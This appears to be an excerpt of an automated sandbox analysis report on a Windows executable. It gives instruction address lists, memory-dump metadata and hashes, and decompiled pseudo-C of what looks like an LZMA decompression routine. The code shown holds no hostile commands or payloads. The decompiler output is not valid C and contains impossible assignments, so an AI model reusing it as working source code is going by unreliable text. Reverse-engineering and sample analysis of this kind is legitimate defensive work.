                                                                                        0x00000000
                                                                                        0x004063cb
                                                                                        0x00000000
                                                                                        0x00406658
                                                                                        0x00406658
                                                                                        0x0040665c
                                                                                        0x00406983
                                                                                        0x00000000
                                                                                        0x00406983
                                                                                        0x00406662
                                                                                        0x00406665
                                                                                        0x00406668
                                                                                        0x0040666c
                                                                                        0x0040666f
                                                                                        0x00406675
                                                                                        0x00406677
                                                                                        0x00406677
                                                                                        0x00406677
                                                                                        0x0040667a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406428
                                                                                        0x00406428
                                                                                        0x0040642b
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406824
                                                                                        0x00406828
                                                                                        0x00406846
                                                                                        0x00406846
                                                                                        0x00406846
                                                                                        0x0040684d
                                                                                        0x00406854
                                                                                        0x00000000
                                                                                        0x00406854
                                                                                        0x0040682a
                                                                                        0x0040682d
                                                                                        0x00406830
                                                                                        0x00406833
                                                                                        0x0040683a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406915
                                                                                        0x00406918
                                                                                        0x00406819
                                                                                        0x00406819
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040654f
                                                                                        0x00406551
                                                                                        0x00406558
                                                                                        0x00406559
                                                                                        0x0040655b
                                                                                        0x0040655e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406566
                                                                                        0x00406569
                                                                                        0x0040656c
                                                                                        0x0040656e
                                                                                        0x00406570
                                                                                        0x00406570
                                                                                        0x00406571
                                                                                        0x00406574
                                                                                        0x0040657b
                                                                                        0x0040657e
                                                                                        0x0040658c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406871
                                                                                        0x00406871
                                                                                        0x00406875
                                                                                        0x004069ad
                                                                                        0x00000000
                                                                                        0x004069ad
                                                                                        0x0040687b
                                                                                        0x0040687e
                                                                                        0x00406881
                                                                                        0x00406885
                                                                                        0x00406888
                                                                                        0x0040688e
                                                                                        0x00406890
                                                                                        0x00406890
                                                                                        0x00406890
                                                                                        0x00406893
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406594
                                                                                        0x00406597
                                                                                        0x004065cd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x00406700
                                                                                        0x00406700
                                                                                        0x00406703
                                                                                        0x00406705
                                                                                        0x0040698f
                                                                                        0x00000000
                                                                                        0x0040698f
                                                                                        0x0040670b
                                                                                        0x0040670e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406714
                                                                                        0x00406718
                                                                                        0x0040671b
                                                                                        0x0040671b
                                                                                        0x0040671b
                                                                                        0x00000000
                                                                                        0x0040671b
                                                                                        0x00406599
                                                                                        0x0040659b
                                                                                        0x0040659d
                                                                                        0x0040659f
                                                                                        0x004065a2
                                                                                        0x004065a3
                                                                                        0x004065a5
                                                                                        0x004065a7
                                                                                        0x004065aa
                                                                                        0x004065ad
                                                                                        0x004065c3
                                                                                        0x004065c8
                                                                                        0x00406600
                                                                                        0x00406600
                                                                                        0x00406604
                                                                                        0x00406630
                                                                                        0x00406632
                                                                                        0x00406639
                                                                                        0x0040663c
                                                                                        0x0040663f
                                                                                        0x0040663f
                                                                                        0x00406644
                                                                                        0x00406644
                                                                                        0x00406646
                                                                                        0x00406649
                                                                                        0x00406650
                                                                                        0x00406653
                                                                                        0x00406680
                                                                                        0x00406680
                                                                                        0x00406683
                                                                                        0x00406686
                                                                                        0x004066fa
                                                                                        0x004066fa
                                                                                        0x004066fa
                                                                                        0x00000000
                                                                                        0x004066fa
                                                                                        0x00406688
                                                                                        0x0040668e
                                                                                        0x00406691
                                                                                        0x00406694
                                                                                        0x00406697
                                                                                        0x0040669a
                                                                                        0x0040669d
                                                                                        0x004066a0
                                                                                        0x004066a3
                                                                                        0x004066a6
                                                                                        0x004066a9
                                                                                        0x004066c2
                                                                                        0x004066c4
                                                                                        0x004066c7
                                                                                        0x004066c8
                                                                                        0x004066cb
                                                                                        0x004066cd
                                                                                        0x004066d0
                                                                                        0x004066d2
                                                                                        0x004066d4
                                                                                        0x004066d7
                                                                                        0x004066d9
                                                                                        0x004066dc
                                                                                        0x004066e0
                                                                                        0x004066e2
                                                                                        0x004066e2
                                                                                        0x004066e3
                                                                                        0x004066e6
                                                                                        0x004066e9
                                                                                        0x004066ab
                                                                                        0x004066ab
                                                                                        0x004066b3
                                                                                        0x004066b8
                                                                                        0x004066ba
                                                                                        0x004066bd
                                                                                        0x004066bd
                                                                                        0x004066ec
                                                                                        0x004066f3
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x00000000
                                                                                        0x004066f5
                                                                                        0x00000000
                                                                                        0x004066f5
                                                                                        0x004066f3
                                                                                        0x00406606
                                                                                        0x00406609
                                                                                        0x0040660b
                                                                                        0x0040660e
                                                                                        0x00406611
                                                                                        0x00406614
                                                                                        0x00406616
                                                                                        0x00406619
                                                                                        0x0040661c
                                                                                        0x0040661c
                                                                                        0x0040661f
                                                                                        0x0040661f
                                                                                        0x00406622
                                                                                        0x00406629
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x00000000
                                                                                        0x0040662b
                                                                                        0x00000000
                                                                                        0x0040662b
                                                                                        0x00406629
                                                                                        0x004065af
                                                                                        0x004065b2
                                                                                        0x004065b4
                                                                                        0x004065b7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406316
                                                                                        0x00406316
                                                                                        0x0040631a
                                                                                        0x0040695f
                                                                                        0x00000000
                                                                                        0x0040695f
                                                                                        0x00406320
                                                                                        0x00406323
                                                                                        0x00406326
                                                                                        0x00406329
                                                                                        0x0040632c
                                                                                        0x0040632f
                                                                                        0x00406332
                                                                                        0x00406334
                                                                                        0x00406337
                                                                                        0x0040633a
                                                                                        0x0040633d
                                                                                        0x0040633f
                                                                                        0x0040633f
                                                                                        0x0040633f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004064a1
                                                                                        0x004064a1
                                                                                        0x004064a5
                                                                                        0x0040696b
                                                                                        0x00000000
                                                                                        0x0040696b
                                                                                        0x004064ab
                                                                                        0x004064ae
                                                                                        0x004064b1
                                                                                        0x004064b4
                                                                                        0x004064b6
                                                                                        0x004064b6
                                                                                        0x004064b6
                                                                                        0x004064b9
                                                                                        0x004064bc
                                                                                        0x004064bf
                                                                                        0x004064c2
                                                                                        0x004064c5
                                                                                        0x004064c8
                                                                                        0x004064c9
                                                                                        0x004064cb
                                                                                        0x004064cb
                                                                                        0x004064cb
                                                                                        0x004064ce
                                                                                        0x004064d1
                                                                                        0x004064d4
                                                                                        0x004064d7
                                                                                        0x004064d7
                                                                                        0x004064d7
                                                                                        0x004064da
                                                                                        0x004064dc
                                                                                        0x004064dc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040671e
                                                                                        0x0040671e
                                                                                        0x0040671e
                                                                                        0x00406722
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406728
                                                                                        0x0040672b
                                                                                        0x0040672e
                                                                                        0x00406731
                                                                                        0x00406733
                                                                                        0x00406733
                                                                                        0x00406733
                                                                                        0x00406736
                                                                                        0x00406739
                                                                                        0x0040673c
                                                                                        0x0040673f
                                                                                        0x00406742
                                                                                        0x00406745
                                                                                        0x00406746
                                                                                        0x00406748
                                                                                        0x00406748
                                                                                        0x00406748
                                                                                        0x0040674b
                                                                                        0x0040674e
                                                                                        0x00406751
                                                                                        0x00406754
                                                                                        0x00406757
                                                                                        0x0040675b
                                                                                        0x0040675d
                                                                                        0x00406760
                                                                                        0x00000000
                                                                                        0x00406762
                                                                                        0x004064df
                                                                                        0x004064df
                                                                                        0x00000000
                                                                                        0x004064df
                                                                                        0x00406760
                                                                                        0x00406995
                                                                                        0x004069b7
                                                                                        0x004069bd
                                                                                        0x004069bf
                                                                                        0x004069c6
                                                                                        0x004069c8
                                                                                        0x004069cf
                                                                                        0x004069d3
                                                                                        0x00000000
                                                                                        0x00405fc4
                                                                                        0x004069cc
                                                                                        0x004069cc
                                                                                        0x00000000
                                                                                        0x004069cc
                                                                                        0x00406819
                                                                                        0x0040689f
                                                                                        0x004068a5
                                                                                        0x004068a8
                                                                                        0x004068ab
                                                                                        0x004068ae
                                                                                        0x004068b1
                                                                                        0x004068b4
                                                                                        0x004068b7
                                                                                        0x004068ba
                                                                                        0x004068c0
                                                                                        0x004068d9
                                                                                        0x004068dc
                                                                                        0x004068df
                                                                                        0x004068e2
                                                                                        0x004068e6
                                                                                        0x004068e8
                                                                                        0x004068e9
                                                                                        0x004068ec
                                                                                        0x004068c2
                                                                                        0x004068c2
                                                                                        0x004068ca
                                                                                        0x004068cf
                                                                                        0x004068d1
                                                                                        0x004068d4
                                                                                        0x004068d4
                                                                                        0x004068f6
                                                                                        0x00000000
                                                                                        0x004068f8
                                                                                        0x00000000
                                                                                        0x004068f8
                                                                                        0x004068f6
                                                                                        0x00000000
                                                                                        0x0040676b

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                        • Instruction ID: 868f2ec1f3ea74d7de1394d818727f69d5aca31e92bf34b5737afca42cfaef71
                                                                                        • Opcode Fuzzy Hash: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                        • Instruction Fuzzy Hash: 6E913171D00229CBEF28CF98C8547ADBBB1FF44305F15812AD856BB281C7789A9ADF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040647D, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 98%
                                                                                        			E0040647D() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
